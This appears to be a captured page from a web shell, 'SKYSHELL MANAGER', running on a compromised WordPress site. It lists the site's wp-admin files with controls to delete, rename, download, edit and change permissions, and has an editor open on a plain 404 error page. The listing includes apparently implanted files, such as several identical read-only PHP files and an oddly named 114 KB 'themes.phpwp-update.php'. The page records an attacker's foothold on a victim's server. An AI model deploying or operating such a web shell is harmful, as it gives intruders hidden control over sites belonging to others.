📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: error.html
<!DOCTYPE html> <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7 "> <![endif]--> <!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]--> <!--[if IE 9]><html class="no-js lt-ie10"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <!-- Basic Page Needs --> <meta charset="utf-8"> <title>MailHob</title> <meta name="description" content=""> <meta name="author" content=""> <!-- Mobile Specific Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Favicons --> <link rel="shortcut icon" href="images/favicon.ico"> <!-- FONTS --> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Roboto:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Patua+One:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Lato:100,100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Lora:100,300,400,400italic,500,700,700italic'> <!-- CSS --> <link rel='stylesheet' href='../css/global.css'> <link rel='stylesheet' href='css/structure.css'> <link rel='stylesheet' href='css/betheme.css'> <link rel='stylesheet' href='css/custom.css'> </head> <body class="error404 color-custom style-default layout-full-width header-plain header-fw minimalist-header sticky-header sticky-white ab-hide subheader-both-center menuo-last menuo-right mm-vertical mobile-tb-hide mobile-mini-mr-ll"> <div id="Error_404"> <div class="container"> <div class="column one"> <div class="error_pic"> <i class="icon-traffic-cone"></i> </div> <div class="error_desk"> <h2>Ooops... Error 404</h2> <h4>We are sorry, but the page you are looking for does not exist.</h4> <p> <span class="check">Please check entered address and try again or </span><a class="button button_filled" href="index.html">go to homepage</a> </p> </div> </div> </div> </div> <!-- JS --> <script src="../js/jquery-2.1.4.min.js"></script> <script src="../js/mfn.menu.js"></script> <script src="../js/jquery.plugins.js"></script> <script src="../js/jquery.jplayer.min.js"></script> <script src="../js/animations/animations.js"></script> <script src="../js/translate3d.js"></script> <script src="../js/scripts.js"></script> <script> jQuery(window).load(function() { var retina = window.devicePixelRatio > 1 ? true : false; if (retina) { var retinaEl = jQuery("#logo img.logo-main"); var retinaLogoW = retinaEl.width(); var retinaLogoH = retinaEl.height(); retinaEl.attr("src", "images/retina-theme.png").width(retinaLogoW).height(retinaLogoH); var stickyEl = jQuery("#logo img.logo-sticky"); var stickyLogoW = stickyEl.width(); var stickyLogoH = stickyEl.height(); stickyEl.attr("src", "images/retina-theme.png").width(stickyLogoW).height(stickyLogoH); var mobileEl = jQuery("#logo img.logo-mobile"); var mobileLogoW = mobileEl.width(); var mobileLogoH = mobileEl.height(); mobileEl.attr("src", "images/retina-theme.png").width(mobileLogoW).height(mobileLogoH); var mobileStickyEl = jQuery("#logo img.logo-mobile-sticky"); var mobileStickyLogoW = mobileStickyEl.width(); var mobileStickyLogoH = mobileStickyEl.height(); mobileStickyEl.attr("src", "images/retina-theme.png").width(mobileStickyLogoW).height(mobileStickyLogoH); } }); </script> </body> </html>
Save